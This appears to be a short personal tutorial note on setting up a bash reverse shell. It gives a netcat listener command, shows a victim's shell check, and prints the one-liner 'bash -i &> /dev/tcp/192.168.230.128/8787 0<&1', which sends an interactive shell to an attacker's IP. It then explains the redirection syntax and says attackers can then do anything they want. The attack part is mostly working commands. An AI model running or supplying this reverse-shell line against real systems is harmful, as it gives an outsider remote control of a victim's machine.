Reverse Shell === 1.Attacker listened on port 8787 ``` nc -lnvp 8787 ``` :::spoiler Victim used ``bash`` ``` ┌──(abby㉿DESKTOP-GQJ3E6V)-[/mnt/c/Users/Abby] └─$ cat /etc/shells # /etc/shells: valid login shells /bin/sh /usr/bin/sh /bin/bash /usr/bin/bash /bin/rbash /usr/bin/rbash /bin/dash /usr/bin/dash /usr/bin/tmux /bin/zsh /usr/bin/zsh ┌──(abby㉿DESKTOP-GQJ3E6V)-[/mnt/c/Users/Abby] └─$ bash ┌──(abby㉿DESKTOP-GQJ3E6V)-[/mnt/c/Users/Abby] └─$ ps -p $$ PID TTY TIME CMD 262 pts/0 00:00:00 bash ``` ::: 2.Victim was opened a socket binding to interactive bash by hacker sneakily, in which the standard output and error of the bash were fed into the socket, while the standard output from attacker was fed into the standard input of the bash, and make it interactively. ``` bash -i &> /dev/tcp/192.168.230.128/8787 0<&1 ``` :::info ``command p>&q`` = ``command p<&q`` duplicate the file descriptor q onto the file descriptor p ``command > file 2>&1``=``command &> file``=``command >& file``(preferred) :::  3.Then attackers can do anything they want. --- Ref. * [/dev/tcp/``host``/``port``](https://blog.csdn.net/lyndon_li/article/details/121447208)